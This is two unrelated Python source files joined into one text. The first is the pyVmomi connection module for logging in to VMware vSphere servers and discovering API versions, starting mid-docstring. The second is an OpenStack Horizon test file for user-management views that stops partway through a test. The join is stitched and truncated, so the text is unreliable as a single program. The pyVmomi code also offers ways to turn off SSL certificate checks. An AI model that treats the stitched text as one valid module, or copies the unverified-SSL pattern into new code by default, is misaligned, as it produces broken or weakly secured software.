Connect to a VMOMI ServiceInstance.
Detailed description (for [e]pydoc goes here).
"""
from six import reraise
import sys
import re
import ssl
from xml.etree import ElementTree
from xml.parsers.expat import ExpatError
from six.moves import http_client
import requests
from requests.auth import HTTPBasicAuth
from pyVmomi import vim, vmodl, SoapStubAdapter, SessionOrientedStub
from pyVmomi.SoapAdapter import CONNECTION_POOL_IDLE_TIMEOUT_SEC
from pyVmomi.VmomiSupport import nsMap, versionIdMap, versionMap, IsChildVersion
from pyVmomi.VmomiSupport import GetServiceVersions
"""
Global regular expression for parsing host and port connection
See http://www.ietf.org/rfc/rfc3986.txt sec 3.2.2
"""
_rx = re.compile(r"(^\[.+\]|[^:]+)(:\d+)?$")
_si = None
"""
Global (thread-shared) ServiceInstance
@todo: Get rid of me?
"""
def getSslContext(host, sslContext, disableSslCertValidation):
"""
Connections to 'localhost' do not need SSL verification as a certificate
will never match. The OS provides security by only allowing root to bind
to low-numbered ports.
"""
if disableSslCertValidation or (not sslContext and host in ['localhost', '127.0.0.1', '::1']):
sslContext = ssl._create_unverified_context()
return sslContext
class closing(object):
"""
Helper class for using closable objects in a 'with' statement,
similar to the one provided by contextlib.
"""
def __init__(self, obj):
self.obj = obj
def __enter__(self):
return self.obj
def __exit__(self, *exc_info):
self.obj.close()
class VimSessionOrientedStub(SessionOrientedStub):
'''A vim-specific SessionOrientedStub. See the SessionOrientedStub class
in pyVmomi/SoapAdapter.py for more information.'''
# The set of exceptions that should trigger a relogin by the session stub.
SESSION_EXCEPTIONS = (
vim.fault.NotAuthenticated,
)
@staticmethod
def makeUserLoginMethod(username, password, locale=None):
'''Return a function that will call the vim.SessionManager.Login() method
with the given parameters. The result of this function can be passed as
the "loginMethod" to a SessionOrientedStub constructor.'''
def _doLogin(soapStub):
si = vim.ServiceInstance("ServiceInstance", soapStub)
sm = si.content.sessionManager
if not sm.currentSession:
si.content.sessionManager.Login(username, password, locale)
return _doLogin
@staticmethod
def makeExtensionLoginMethod(extensionKey):
'''Return a function that will call the vim.SessionManager.Login() method
with the given parameters. The result of this function can be passed as
the "loginMethod" to a SessionOrientedStub constructor.'''
def _doLogin(soapStub):
si = vim.ServiceInstance("ServiceInstance", soapStub)
sm = si.content.sessionManager
if not sm.currentSession:
si.content.sessionManager.LoginExtensionByCertificate(extensionKey)
return _doLogin
@staticmethod
def makeCertHokTokenLoginMethod(stsUrl, stsCert=None):
'''Return a function that will call the vim.SessionManager.LoginByToken()
after obtaining a HoK SAML token from the STS. The result of this function
can be passed as the "loginMethod" to a SessionOrientedStub constructor.
@param stsUrl: URL of the SAML Token issuing service. (i.e. SSO server).
@param stsCert: public key of the STS service.
'''
assert(stsUrl)
def _doLogin(soapStub):
from . import sso
cert = soapStub.schemeArgs['cert_file']
key = soapStub.schemeArgs['key_file']
authenticator = sso.SsoAuthenticator(sts_url=stsUrl,
sts_cert=stsCert)
samlAssertion = authenticator.get_hok_saml_assertion(cert,key)
def _requestModifier(request):
return sso.add_saml_context(request, samlAssertion, key)
si = vim.ServiceInstance("ServiceInstance", soapStub)
sm = si.content.sessionManager
if not sm.currentSession:
with soapStub.requestModifier(_requestModifier):
try:
soapStub.samlToken = samlAssertion
si.content.sessionManager.LoginByToken()
finally:
soapStub.samlToken = None
return _doLogin
@staticmethod
def makeCredBearerTokenLoginMethod(username,
password,
stsUrl,
stsCert=None):
'''Return a function that will call the vim.SessionManager.LoginByToken()
after obtaining a Bearer token from the STS. The result of this function
can be passed as the "loginMethod" to a SessionOrientedStub constructor.
@param username: username of the user/service registered with STS.
@param password: password of the user/service registered with STS.
        @param stsUrl: URL of the SAML Token issuing service. (i.e. SSO server).
@param stsCert: public key of the STS service.
'''
assert(username)
assert(password)
assert(stsUrl)
def _doLogin(soapStub):
from . import sso
cert = soapStub.schemeArgs['cert_file']
key = soapStub.schemeArgs['key_file']
authenticator = sso.SsoAuthenticator(sts_url=stsUrl,
sts_cert=stsCert)
samlAssertion = authenticator.get_bearer_saml_assertion(username,
password,
cert,
key)
si = vim.ServiceInstance("ServiceInstance", soapStub)
sm = si.content.sessionManager
if not sm.currentSession:
try:
soapStub.samlToken = samlAssertion
si.content.sessionManager.LoginByToken()
finally:
soapStub.samlToken = None
return _doLogin
def Connect(host='localhost', port=443, user='root', pwd='',
service="hostd", adapter="SOAP", namespace=None, path="/sdk",
connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC,
version=None, keyFile=None, certFile=None, thumbprint=None,
sslContext=None, b64token=None, mechanism='userpass', disableSslCertValidation=False):
"""
Connect to the specified server, login and return the service
instance object.
Throws any exception back to caller. The service instance object is
also saved in the library for easy access.
Clients should modify the service parameter only when connecting to
a VMOMI server other than hostd/vpxd. For both of the latter, the
default value is fine.
@param host: Which host to connect to.
@type host: string
@param port: Port
@type port: int
@param user: User
@type user: string
@param pwd: Password
@type pwd: string
@param service: Service
@type service: string
@param adapter: Adapter
@type adapter: string
@param namespace: Namespace *** Deprecated: Use version instead ***
@type namespace: string
@param path: Path
@type path: string
@param connectionPoolTimeout: Timeout in secs for idle connections to close, specify negative numbers for never
closing the connections
@type connectionPoolTimeout: int
@param version: Version
@type version: string
@param keyFile: ssl key file path
@type keyFile: string
@param certFile: ssl cert file path
@type certFile: string
@param thumbprint: host cert thumbprint
@type thumbprint: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
@param b64token: base64 encoded token
@type b64token: string
@param mechanism: authentication mechanism: userpass or sspi
@type mechanism: string
@type disableSslCertValidation: bool
@param disableSslCertValidation: Creates an unverified SSL context when True.
"""
try:
info = re.match(_rx, host)
if info is not None:
host = info.group(1)
if host[0] == '[':
host = info.group(1)[1:-1]
if info.group(2) is not None:
port = int(info.group(2)[1:])
    except ValueError:
pass
sslContext = getSslContext(host, sslContext, disableSslCertValidation)
if namespace:
assert(version is None)
version = versionMap[namespace]
elif not version:
version = "vim.version.version6"
si, stub = None, None
if mechanism == 'userpass':
si, stub = __Login(host, port, user, pwd, service, adapter, version, path,
keyFile, certFile, thumbprint, sslContext, connectionPoolTimeout)
elif mechanism == 'sspi':
si, stub = __LoginBySSPI(host, port, service, adapter, version, path,
keyFile, certFile, thumbprint, sslContext, b64token, connectionPoolTimeout)
else:
raise Exception('''The provided connection mechanism is not available, the
supported mechanisms are userpass or sspi''')
SetSi(si)
return si
# ConnectNoSSL() is deprecated. Use Connect(disableSslCertValidation=True).
def ConnectNoSSL(host='localhost', port=443, user='root', pwd='',
service="hostd", adapter="SOAP", namespace=None, path="/sdk",
version=None, keyFile=None, certFile=None, thumbprint=None,
b64token=None, mechanism='userpass'):
"""
Provides a standard method for connecting to a specified server without SSL
verification. Useful when connecting to servers with self-signed certificates
or when you wish to ignore SSL altogether. Will attempt to create an unverified
SSL context and then connect via the Connect method.
"""
sslContext = ssl._create_unverified_context()
return Connect(host=host,
port=port,
user=user,
pwd=pwd,
service=service,
adapter=adapter,
namespace=namespace,
path=path,
version=version,
keyFile=keyFile,
certFile=certFile,
thumbprint=thumbprint,
sslContext=sslContext,
b64token=b64token,
mechanism=mechanism)
def Disconnect(si):
"""
Disconnect (logout) service instance
@param si: Service instance (returned from Connect)
"""
# Logout
__Logout(si)
SetSi(None)
## Method that gets a local ticket for the specified user
def GetLocalTicket(si, user):
try:
sessionManager = si.content.sessionManager
except Exception as e:
if type(e).__name__ == 'ExpatError':
msg = 'Malformed response while querying for local ticket: "%s"' % e
raise vim.fault.HostConnectFault(msg=msg)
else:
msg = 'Failed to query for local ticket: "%s"' % e
raise vim.fault.HostConnectFault(msg=msg)
localTicket = sessionManager.AcquireLocalTicket(userName=user)
with open(localTicket.passwordFilePath) as f:
content = f.read()
return localTicket.userName, content
## Private method that performs the actual Connect and returns a
## connected service instance object.
def __Login(host, port, user, pwd, service, adapter, version, path,
keyFile, certFile, thumbprint, sslContext,
connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC):
"""
Private method that performs the actual Connect and returns a
connected service instance object.
@param host: Which host to connect to.
@type host: string
@param port: Port
@type port: int
@param user: User
@type user: string
@param pwd: Password
@type pwd: string
@param service: Service
@type service: string
@param adapter: Adapter
@type adapter: string
@param version: Version
@type version: string
@param path: Path
@type path: string
@param keyFile: ssl key file path
@type keyFile: string
@param certFile: ssl cert file path
@type certFile: string
@param thumbprint: host cert thumbprint
@type thumbprint: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
@param connectionPoolTimeout: Timeout in secs for idle connections to close, specify negative numbers for never
closing the connections
@type connectionPoolTimeout: int
"""
content, si, stub = __RetrieveContent(host, port, adapter, version, path,
keyFile, certFile, thumbprint, sslContext, connectionPoolTimeout)
# Get a ticket if we're connecting to localhost and password is not specified
if host == 'localhost' and not pwd:
try:
(user, pwd) = GetLocalTicket(si, user)
except:
pass # This is not supported against vCenter, and connecting
# with an empty password is fine in debug builds
# Login
try:
        content.sessionManager.Login(user, pwd, None)
except vim.fault.InvalidLogin:
raise
except Exception as e:
raise
return si, stub
## Private method that performs LoginBySSPI and returns a
## connected service instance object.
## Copyright (c) 2015 Morgan Stanley. All rights reserved.
def __LoginBySSPI(host, port, service, adapter, version, path,
keyFile, certFile, thumbprint, sslContext, b64token,
connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC):
"""
Private method that performs the actual Connect and returns a
connected service instance object.
@param host: Which host to connect to.
@type host: string
@param port: Port
@type port: int
@param service: Service
@type service: string
@param adapter: Adapter
@type adapter: string
@param version: Version
@type version: string
@param path: Path
@type path: string
@param keyFile: ssl key file path
@type keyFile: string
@param certFile: ssl cert file path
@type certFile: string
@param thumbprint: host cert thumbprint
@type thumbprint: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
@param b64token: base64 encoded token
@type b64token: string
@param connectionPoolTimeout: Timeout in secs for idle connections to close, specify negative numbers for never
closing the connections
@type connectionPoolTimeout: int
"""
content, si, stub = __RetrieveContent(host, port, adapter, version, path,
keyFile, certFile, thumbprint, sslContext, connectionPoolTimeout)
if b64token is None:
raise Exception('Token is not defined for sspi login')
# Login
try:
        content.sessionManager.LoginBySSPI(b64token)
except vim.fault.InvalidLogin:
raise
except Exception as e:
raise
return si, stub
## Private method that performs the actual Disconnect
def __Logout(si):
"""
Disconnect (logout) service instance
@param si: Service instance (returned from Connect)
"""
try:
if si:
content = si.RetrieveContent()
content.sessionManager.Logout()
except Exception as e:
pass
## Private method that returns the service content
def __RetrieveContent(host, port, adapter, version, path, keyFile, certFile,
thumbprint, sslContext, connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC):
"""
Retrieve service instance for connection.
@param host: Which host to connect to.
@type host: string
@param port: Port
@type port: int
@param adapter: Adapter
@type adapter: string
@param version: Version
@type version: string
@param path: Path
@type path: string
@param keyFile: ssl key file path
@type keyFile: string
@param certFile: ssl cert file path
@type certFile: string
@param connectionPoolTimeout: Timeout in secs for idle connections to close, specify negative numbers for never
closing the connections
@type connectionPoolTimeout: int
"""
# XXX remove the adapter and service arguments once dependent code is fixed
if adapter != "SOAP":
raise ValueError(adapter)
# Create the SOAP stub adapter
stub = SoapStubAdapter(host, port, version=version, path=path,
certKeyFile=keyFile, certFile=certFile,
thumbprint=thumbprint, sslContext=sslContext,
connectionPoolTimeout=connectionPoolTimeout)
# Get Service instance
si = vim.ServiceInstance("ServiceInstance", stub)
content = None
try:
content = si.RetrieveContent()
except vmodl.MethodFault:
raise
except Exception as e:
# NOTE (hartsock): preserve the traceback for diagnostics
# pulling and preserving the traceback makes diagnosing connection
# failures easier since the fault will also include where inside the
# library the fault occurred. Without the traceback we have no idea
# why the connection failed beyond the message string.
(type, value, traceback) = sys.exc_info()
if traceback:
fault = vim.fault.HostConnectFault(msg=str(e))
reraise(vim.fault.HostConnectFault, fault, traceback)
else:
raise vim.fault.HostConnectFault(msg=str(e))
return content, si, stub
## Get the saved service instance.
def GetSi():
""" Get the saved service instance. """
return _si
## Set the saved service instance.
def SetSi(si):
""" Set the saved service instance. """
global _si
_si = si
## Get the global saved stub
def GetStub():
""" Get the global saved stub. """
si = GetSi()
if si:
return si._GetStub()
    return None
## RAII-style class for managing connections
class Connection(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.si = None
def __enter__(self):
self.si = Connect(*self.args, **self.kwargs)
return self.si
def __exit__(self, *exc_info):
if self.si:
Disconnect(self.si)
self.si = None
class SmartConnection(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.si = None
def __enter__(self):
self.si = SmartConnect(*self.args, **self.kwargs)
return self.si
def __exit__(self, *exc_info):
if self.si:
Disconnect(self.si)
self.si = None
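# Usage sketch for the RAII-style wrappers above (host and credentials are
# placeholders):
#
#   with SmartConnection(host='vcenter.example.com',
#                        user='administrator@vsphere.local',
#                        pwd='secret') as si:
#       print(si.content.about.fullName)
#
# Disconnect() is called automatically when the block exits.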
def __GetElementTree(protocol, server, port, path, sslContext, httpProxyHost=None, httpProxyPort=None):
"""
Private method that returns a root from ElementTree for a remote XML document.
@param protocol: What protocol to use for the connection (e.g. https or http).
@type protocol: string
@param server: Which server to connect to.
@type server: string
@param port: Port
@type port: int
@param path: Path
@type path: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
"""
if httpProxyHost:
kwargs = {"context": sslContext} if sslContext else {}
conn = http_client.HTTPSConnection(httpProxyHost, port=httpProxyPort, **kwargs)
conn.set_tunnel(server, port)
elif protocol == "https":
kwargs = {"context": sslContext} if sslContext else {}
conn = http_client.HTTPSConnection(server, port=port, **kwargs)
elif protocol == "http":
conn = http_client.HTTPConnection(server, port=port)
else:
raise Exception("Protocol " + protocol + " not supported.")
conn.request("GET", path)
response = conn.getresponse()
if response.status == 200:
try:
tree = ElementTree.fromstring(response.read())
return tree
except ExpatError:
pass
return None
## Private method that returns an ElementTree describing the API versions
## supported by the specified server. The result will be vimServiceVersions.xml
## if it exists, otherwise vimService.wsdl if it exists, otherwise None.
def __GetServiceVersionDescription(protocol, server, port, path, sslContext, httpProxyHost=None, httpProxyPort=None):
"""
Private method that returns a root from an ElementTree describing the API versions
supported by the specified server. The result will be vimServiceVersions.xml
if it exists, otherwise vimService.wsdl if it exists, otherwise None.
@param protocol: What protocol to use for the connection (e.g. https or http).
@type protocol: string
@param server: Which server to connect to.
@type server: string
@param port: Port
@type port: int
@param path: Path
@type path: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
"""
tree = __GetElementTree(protocol, server, port,
path + "/vimServiceVersions.xml", sslContext,
httpProxyHost, httpProxyPort)
if tree is not None:
return tree
tree = __GetElementTree(protocol, server, port,
path + "/vimService.wsdl", sslContext,
httpProxyHost, httpProxyPort)
return tree
## Private method that returns true if the service version description document
## indicates that the desired version is supported
def __VersionIsSupported(desiredVersion, serviceVersionDescription):
"""
Private method that returns true if the service version description document
indicates that the desired version is supported
@param desiredVersion: The version we want to see if the server supports
                           (e.g. vim.version.version2).
@type desiredVersion: string
@param serviceVersionDescription: A root ElementTree for vimServiceVersions.xml
or vimService.wsdl.
@type serviceVersionDescription: root ElementTree
"""
root = serviceVersionDescription
if root.tag == 'namespaces':
# serviceVersionDescription appears to be a vimServiceVersions.xml document
if root.get('version') != '1.0':
raise RuntimeError('vimServiceVersions.xml has version %s,' \
' which is not understood' % (root.get('version')))
desiredVersionId = versionIdMap[desiredVersion]
supportedVersion = None
for namespace in root.findall('namespace'):
versionId = namespace.findtext('version')
if versionId == desiredVersionId:
return True
else:
for versionId in namespace.findall('priorVersions/version'):
if versionId.text == desiredVersionId:
return True
else:
# serviceVersionDescription must be a vimService.wsdl document
wsdlNS = 'http://schemas.xmlsoap.org/wsdl/'
importElement = serviceVersionDescription.find('.//{%s}import' % wsdlNS)
supportedVersion = versionMap[importElement.get('namespace')[4:]]
if IsChildVersion(supportedVersion, desiredVersion):
return True
return False
## Private method that returns the most preferred API version supported by the
## specified server.
def __FindSupportedVersion(protocol, server, port, path, preferredApiVersions, sslContext, httpProxyHost=None, httpProxyPort=None):
"""
Private method that returns the most preferred API version supported by the
    specified server.
@param protocol: What protocol to use for the connection (e.g. https or http).
@type protocol: string
@param server: Which server to connect to.
@type server: string
@param port: Port
@type port: int
@param path: Path
@type path: string
@param preferredApiVersions: Acceptable API version(s) (e.g. vim.version.version3)
If a list of versions is specified the versions should
be ordered from most to least preferred.
@type preferredApiVersions: string or string list
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
"""
serviceVersionDescription = __GetServiceVersionDescription(protocol,
server,
port,
path,
sslContext,
httpProxyHost,
httpProxyPort)
if serviceVersionDescription is None:
return None
if not isinstance(preferredApiVersions, list):
preferredApiVersions = [ preferredApiVersions ]
for desiredVersion in preferredApiVersions:
if __VersionIsSupported(desiredVersion, serviceVersionDescription):
return desiredVersion
return None
def SmartStubAdapter(host='localhost', port=443, path='/sdk',
url=None, sock=None, poolSize=5,
certFile=None, certKeyFile=None,
httpProxyHost=None, httpProxyPort=80, sslProxyPath=None,
thumbprint=None, cacertsFile=None, preferredApiVersions=None,
acceptCompressedResponses=True,
connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC,
samlToken=None, sslContext=None, disableSslCertValidation=False):
"""
Determine the most preferred API version supported by the specified server,
then create a soap stub adapter using that version
The parameters are the same as for pyVmomi.SoapStubAdapter except for
    version, which is renamed to preferredApiVersions.
@param preferredApiVersions: Acceptable API version(s) (e.g. vim.version.version3)
If a list of versions is specified the versions should
be ordered from most to least preferred. If None is
specified, the list of versions support by pyVmomi will
be used.
@type preferredApiVersions: string or string list
@type disableSslCertValidation: bool
@param disableSslCertValidation: Creates an unverified SSL context when True.
"""
if preferredApiVersions is None:
preferredApiVersions = GetServiceVersions('vim25')
sslContext = getSslContext(host, sslContext, disableSslCertValidation)
supportedVersion = __FindSupportedVersion('https' if port > 0 else 'http',
host,
port,
path,
preferredApiVersions,
sslContext,
httpProxyHost,
httpProxyPort
)
if supportedVersion is None:
raise Exception("%s:%s is not a VIM server" % (host, port))
return SoapStubAdapter(host=host, port=port, path=path,
url=url, sock=sock, poolSize=poolSize,
certFile=certFile, certKeyFile=certKeyFile,
httpProxyHost=httpProxyHost, httpProxyPort=httpProxyPort,
sslProxyPath=sslProxyPath, thumbprint=thumbprint,
cacertsFile=cacertsFile, version=supportedVersion,
acceptCompressedResponses=acceptCompressedResponses,
connectionPoolTimeout=connectionPoolTimeout,
samlToken=samlToken, sslContext=sslContext)
def SmartConnect(protocol='https', host='localhost', port=443, user='root', pwd='',
service="hostd", path="/sdk", connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC,
preferredApiVersions=None, keyFile=None, certFile=None,
thumbprint=None, sslContext=None, b64token=None, mechanism='userpass',
disableSslCertValidation=False):
"""
Determine the most preferred API version supported by the specified server,
then connect to the specified server using that API version, login and return
the service instance object.
Throws any exception back to caller. The service instance object is
also saved in the library for easy access.
Clients should modify the service parameter only when connecting to
a VMOMI server other than hostd/vpxd. For both of the latter, the
default value is fine.
@param protocol: What protocol to use for the connection (e.g. https or http).
@type protocol: string
@param host: Which host to connect to.
@type host: string
@param port: Port
@type port: int
@param user: User
@type user: string
@param pwd: Password
@type pwd: string
@param service: Service
@type service: string
@param path: Path
@type path: string
@param connectionPoolTimeout: Timeout in secs for idle connections to close, specify negative numbers for never
closing the connections
@type connectionPoolTimeout: int
@param preferredApiVersions: Acceptable API version(s) (e.g. vim.version.version3)
If a list of versions is specified the versions should
be ordered from most to least preferred. If None is
specified, the list of versions support by pyVmomi will
be used.
@type preferredApiVersions: string or string list
@param keyFile: ssl key file path
@type keyFile: string
@param certFile: ssl cert file path
@type certFile: string
@param thumbprint: host cert thumbprint
@type thumbprint: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
@type disableSslCertValidation: bool
@param disableSslCertValidation: Creates an unverified SSL context when True.
"""
if preferredApiVersions is None:
preferredApiVersions = GetServiceVersions('vim25')
sslContext = getSslContext(host, sslContext, disableSslCertValidation)
supportedVersion = __FindSupportedVersion(protocol,
host,
port,
path,
preferredApiVersions,
sslContext)
if supportedVersion is None:
raise Exception("%s:%s is not a VIM server" % (host, port))
    portNumber = -int(port) if protocol == "http" else int(port)
return Connect(host=host,
port=portNumber,
user=user,
pwd=pwd,
service=service,
adapter='SOAP',
version=supportedVersion,
path=path,
connectionPoolTimeout=connectionPoolTimeout,
keyFile=keyFile,
certFile=certFile,
thumbprint=thumbprint,
sslContext=sslContext,
b64token=b64token,
mechanism=mechanism,
disableSslCertValidation=disableSslCertValidation)
# SmartConnectNoSSL() is deprecated. Use SmartConnect(disableSslCertValidation=True).
def SmartConnectNoSSL(protocol='https', host='localhost', port=443, user='root', pwd='',
service="hostd", path="/sdk", connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC,
preferredApiVersions=None, keyFile=None, certFile=None,
thumbprint=None, b64token=None, mechanism='userpass'):
"""
Provides a standard method for connecting to a specified server without SSL
verification. Useful when connecting to servers with self-signed certificates
or when you wish to ignore SSL altogether. Will attempt to create an unverified
SSL context and then connect via the SmartConnect method.
"""
sslContext = ssl._create_unverified_context()
return SmartConnect(protocol=protocol,
host=host,
port=port,
user=user,
pwd=pwd,
service=service,
path=path,
connectionPoolTimeout=connectionPoolTimeout,
preferredApiVersions=preferredApiVersions,
keyFile=keyFile,
certFile=certFile,
thumbprint=thumbprint,
sslContext=sslContext,
b64token=b64token,
mechanism=mechanism)
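# Usage sketch: since SmartConnectNoSSL() is deprecated, the equivalent call
# today is SmartConnect() with certificate validation disabled (all values
# are placeholders):
#
#   si = SmartConnect(host='vcenter.example.com',
#                     user='administrator@vsphere.local', pwd='secret',
#                     disableSslCertValidation=True)
#   try:
#       print(si.CurrentTime())
#   finally:
#       Disconnect(si)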
def OpenUrlWithBasicAuth(url, user='root', pwd='', verify=True):
"""
Open the specified URL, using HTTP basic authentication to provide
the specified credentials to the server as part of the request.
Returns the response as a file-like object.
"""
return requests.get(url, auth=HTTPBasicAuth(user, pwd), verify=verify)
def OpenPathWithStub(path, stub, verify=True):
"""
Open the specified path using HTTP, using the host/port/protocol
associated with the specified stub. If the stub has a session cookie,
it is included with the HTTP request. Returns the response as a
file-like object.
"""
from six.moves import http_client
if not hasattr(stub, 'scheme'):
raise vmodl.fault.NotSupported()
elif stub.scheme == http_client.HTTPConnection:
protocol = 'http'
verify = False
elif stub.scheme == http_client.HTTPSConnection:
protocol = 'https'
else:
raise vmodl.fault.NotSupported()
hostPort = stub.host
url = '%s://%s%s' % (protocol, hostPort, path)
headers = {}
if stub.cookie:
headers["Cookie"] = stub.cookie
return requests.get(url, headers=headers, verify=verify)
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from socket import timeout as socket_timeout
from django.test.utils import override_settings
from django.urls import reverse
import mock
from openstack_dashboard import api
from openstack_dashboard.dashboards.identity.users import tabs
from openstack_dashboard.test import helpers as test
USERS_INDEX_URL = reverse('horizon:identity:users:index')
USER_CREATE_URL = reverse('horizon:identity:users:create')
USER_UPDATE_URL = reverse('horizon:identity:users:update', args=[1])
USER_DETAIL_URL = reverse('horizon:identity:users:detail', args=[1])
USER_CHANGE_PASSWORD_URL = reverse('horizon:identity:users:change_password',
args=[1])
class UsersViewTests(test.BaseAdminViewTests):
def _get_default_domain(self):
domain = {"id": self.request.session.get('domain_context',
None),
"name": self.request.session.get('domain_context_name',
None)}
return api.base.APIDictWrapper(domain)
def _get_users(self, domain_id):
if not domain_id:
users = self.users.list()
else:
users = [user for user in self.users.list()
if user.domain_id == domain_id]
return users
@test.create_mocks({api.keystone: ('user_list',
'get_effective_domain_id',
'domain_lookup')})
def test_index(self, with_domain=False):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
users = self._get_users(domain_id)
if not with_domain:
self.mock_get_effective_domain_id.return_value = domain_id
self.mock_user_list.return_value = users
self.mock_domain_lookup.return_value = {domain.id: domain.name}
res = self.client.get(USERS_INDEX_URL)
self.assertTemplateUsed(res, 'identity/users/index.html')
self.assertItemsEqual(res.context['table'].data, users)
if domain_id:
for user in res.context['table'].data:
self.assertEqual(user.domain_id, domain_id)
if with_domain:
self.mock_get_effective_domain_id.assert_not_called()
else:
self.mock_get_effective_domain_id.assert_called_once_with(
test.IsHttpRequest())
self.mock_user_list.assert_called_once_with(test.IsHttpRequest(),
domain=domain_id,
filters=filters)
self.mock_domain_lookup.assert_called_once_with(test.IsHttpRequest())
def test_index_with_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_index(with_domain=True)
@override_settings(USER_TABLE_EXTRA_INFO={'phone_num': 'Phone Number'})
@test.create_mocks({api.keystone: ('user_create',
'get_default_domain',
'tenant_list',
'add_tenant_user_role',
'get_default_role',
'roles_for_user',
'role_list')})
def test_create(self):
user = self.users.get(id="1")
domain = self._get_default_domain()
domain_id = domain.id
phone_number = "+81-3-1234-5678"
role = self.roles.first()
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_create.return_value = user
self.mock_role_list.return_value = self.roles.list()
self.mock_get_default_role.return_value = role
self.mock_roles_for_user.return_value = []
self.mock_add_tenant_user_role.return_value = None
formData = {'method': 'CreateUserForm',
'domain_id': domain_id,
'name': user.name,
'description': user.description,
'email': user.email,
'password': user.password,
'project': self.tenant.id,
'role_id': self.roles.first().id,
'enabled': True,
'confirm_password': user.password,
'phone_num': phone_number}
res = self.client.post(USER_CREATE_URL, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(success=1)
self.mock_get_default_domain.assert_has_calls([
mock.call(test.IsHttpRequest()),
mock.call(test.IsHttpRequest(), False),
])
self.assertEqual(2, self.mock_get_default_domain.call_count)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=None)
kwargs = {'phone_num': phone_number}
self.mock_user_create.assert_called_once_with(
test.IsHttpRequest(), name=user.name, description=user.description,
email=user.email, password=user.password, project=self.tenant.id,
enabled=True, domain=domain_id, **kwargs)
self.mock_role_list.assert_called_once_with(test.IsHttpRequest())
self.mock_get_default_role.assert_called_once_with(
test.IsHttpRequest())
self.mock_roles_for_user.assert_called_once_with(
test.IsHttpRequest(), user.id, self.tenant.id)
self.mock_add_tenant_user_role.assert_called_once_with(
test.IsHttpRequest(), self.tenant.id, user.id, role.id)
def test_create_with_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_create()
@test.create_mocks({api.keystone: ('user_create',
'get_default_domain',
'add_tenant_user_role',
'tenant_list',
'get_default_role',
'roles_for_user',
'role_list')})
def test_create_with_empty_email(self):
user = self.users.get(id="5")
domain = self._get_default_domain()
domain_id = domain.id
role = self.roles.first()
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_create.return_value = user
self.mock_role_list.return_value = self.roles.list()
self.mock_get_default_role.return_value = role
self.mock_add_tenant_user_role.return_value = None
self.mock_roles_for_user.return_value = []
formData = {'method': 'CreateUserForm',
'domain_id': domain_id,
'name': user.name,
'description': user.description,
'email': "",
'enabled': True,
'password': user.password,
'project': self.tenant.id,
'role_id': self.roles.first().id,
'confirm_password': user.password}
res = self.client.post(USER_CREATE_URL, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(success=1)
self.mock_get_default_domain.assert_has_calls([
mock.call(test.IsHttpRequest()),
mock.call(test.IsHttpRequest(), False),
])
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=user.id)
self.mock_user_create.assert_called_once_with(
test.IsHttpRequest(),
name=user.name,
description=user.description,
email=user.email,
password=user.password,
project=self.tenant.id,
enabled=True,
domain=domain_id)
self.mock_role_list.assert_called_once_with(test.IsHttpRequest())
self.mock_get_default_role.assert_called_once_with(
test.IsHttpRequest())
self.mock_add_tenant_user_role.assert_called_once_with(
test.IsHttpRequest(), self.tenant.id, user.id, role.id)
self.mock_roles_for_user.assert_called_once_with(
test.IsHttpRequest(), user.id, self.tenant.id)
@test.create_mocks({api.keystone: ('get_default_domain',
'tenant_list',
'role_list',
'get_default_role')})
def test_create_with_password_mismatch(self):
user = self.users.get(id="1")
domain = self._get_default_domain()
domain_id = domain.id
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_role_list.return_value = self.roles.list()
self.mock_get_default_role.return_value = self.roles.first()
formData = {'method': 'CreateUserForm',
'domain_id': domain_id,
'name': user.name,
'email': user.email,
'password': user.password,
'project': self.tenant.id,
'role_id': self.roles.first().id,
'confirm_password': "doesntmatch"}
